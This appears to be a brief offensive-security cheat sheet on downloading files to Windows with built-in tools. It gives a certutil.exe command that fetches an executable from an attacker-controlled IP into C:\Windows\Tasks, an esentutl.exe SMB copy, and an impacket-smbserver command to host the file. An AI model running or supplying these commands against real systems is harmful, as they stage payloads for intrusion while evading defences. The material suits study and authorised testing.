Simple file download
Certutil.exe
certutil.exe -urlcache -split -f http://192.168.45.152/ConsoleApp1.exe C:\Windows\Tasks\ConsoleApp1.exeDownloads specified file (use Apache instead of python serv)
Esentutl.exe
esentutl.exe /y \\\\192.168.45.152\\win_share\\ConsoleApp1.exe /d C:\Windows\Tasks\ConsoleApp1.exe /oDownloads specified file by SMB, host file using SMB server as follows:
sudo impacket-smbserver win_share -smb2support /mnt/win_shareLast updated